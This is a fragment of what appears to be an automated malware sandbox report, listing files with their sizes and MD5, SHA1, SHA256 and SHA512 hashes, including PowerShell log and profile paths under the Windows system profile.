SHA51270ed462d1f5b5d23ccaff9c2512c5ca7f35ff818f34089c02b1a01048b4f5245da76bc7b09baee0ffd3f6ea8d398f85f0531a8161f5e4f347c914f01ea0c340a
-
Filesize
6.8MB
MD51442a2d278cea34e0c7e095683835c4b
SHA1fed96b291038fa4009938a57f8d92108ca2bb65f
SHA256d426cd3f3798a1a62b254dea16846db5f1f035d4a20ea38e4dc0aa3a8ce09ba1
SHA51270ed462d1f5b5d23ccaff9c2512c5ca7f35ff818f34089c02b1a01048b4f5245da76bc7b09baee0ffd3f6ea8d398f85f0531a8161f5e4f347c914f01ea0c340a
-
C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
Filesize1KB
MD533b19d75aa77114216dbc23f43b195e3
SHA136a6c3975e619e0c5232aa4f5b7dc1fec9525535
SHA256b23ced31b855e5a39c94afa1f9d55b023b8c40d4dc62143e0539c6916c12c9d2
SHA512676fa2fd34878b75e5899197fe6826bb5604541aa468804bc9835bd3acabed2e6759878a8f1358955413818a51456816e90f149133828575a416c2a74fc7d821
-
C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize11KB
MD5a5415e26dd37e32fc715ca2bca599106
SHA1e4e70ba671c4a3f047498b92597d077df6b888a7
SHA2564d6b6c3da875646fe173a75831ed14bacac77c6e6c56c61e8fea6fe5f6fd73b9
SHA512d91dd6dc7fc15a671154e3604b7413f719c9a81136e47e55fb71a355e161ff5952cc227099feb545d0c7dce0c7293d30bcd427bcbf14e752135f83eb4959e0fa
-
Filesize
6.2MB
MD562c45ae58939e5a06c28eb02ec3b775e
SHA170ca4ed5664aa911fabf2a1bd46c119fa3ce0742
SHA256137c3467a0623951f2d36e79a10f50125903581310ad6fe01e8f559d9c53b072
SHA51243e132a946470cc89374e99c89bb7a2a48d88d0c601e36871632d5954377b7b4b9671b516cd6b2dc69f8e0296b3ee4ec6e3a6f1ff81f847285af9f535e84dbec
-
Filesize
6.2MB
MD562c45ae58939e5a06c28eb02ec3b775e
SHA170ca4ed5664aa911fabf2a1bd46c119fa3ce0742
SHA256137c3467a0623951f2d36e79a10f50125903581310ad6fe01e8f559d9c53b072
SHA51243e132a946470cc89374e99c89bb7a2a48d88d0c601e36871632d5954377b7b4b9671b516cd6b2dc69f8e0296b3ee4ec6e3a6f1ff81f847285af9f535e84dbec
-
Filesize
6.8MB
MD51442a2d278cea34e0c7e095683835c4b
SHA1fed96b291038fa4009938a57f8d92108ca2bb65f
SHA256d426cd3f3798a1a62b254dea16846db5f1f035d4a20ea38e4dc0aa3a8ce09ba1
SHA51270ed462d1f5b5d23ccaff9c2512c5ca7f35ff818f34089c02b1a01048b4f5245da76bc7b09baee0ffd3f6ea8d398f85f0531a8161f5e4f347c914f01ea0c340a
-
Filesize
6.8MB
MD51442a2d278cea34e0c7e095683835c4b
SHA1fed96b291038fa4009938a57f8d92108ca2bb65f
SHA256d426cd3f3798a1a62b254dea16846db5f1f035d4a20ea38e4dc0aa3a8ce09ba1
SHA51270ed462d1f5b5d23ccaff9c2512c5ca7f35ff818f34089c02b1a01048b4f5245da76bc7b09baee0ffd3f6ea8d398f85f0531a8161f5e4f347c914f01ea0c340a
-
Filesize
4KB
MD59fa5e173097ad723f4f65c67115af515
SHA1e5d6422f3b4238b94a8280c826329ed732b7facd
SHA2569e7053cf295032fe7dc4aa5bdd7e7efc5dee18c7f02ca194ef5e484ceecdf9b7
SHA512a801dc1b9d8ecae6a3b600a5abb563109a49b35a4d468ac9b639ef6720d3695622eb1bf9a18b27f0ca4c1069a38636419a69e61e2dff11d7984fafa9b3e4cb2e
-
Filesize
268B
MD5a62ce44a33f1c05fc2d340ea0ca118a4
SHA11f03eb4716015528f3de7f7674532c1345b2717d
SHA2569f2cd4acf23d565bc8498c989fccccf59fd207ef8925111dc63e78649735404a
SHA5129d9a4da2df0550afdb7b80be22c6f4ef7da5a52cc2bb4831b8ff6f30f0ee9eac8960f61cdd7cfe0b1b6534a0f9e738f7eb8ea3839d2d92abeb81660de76e7732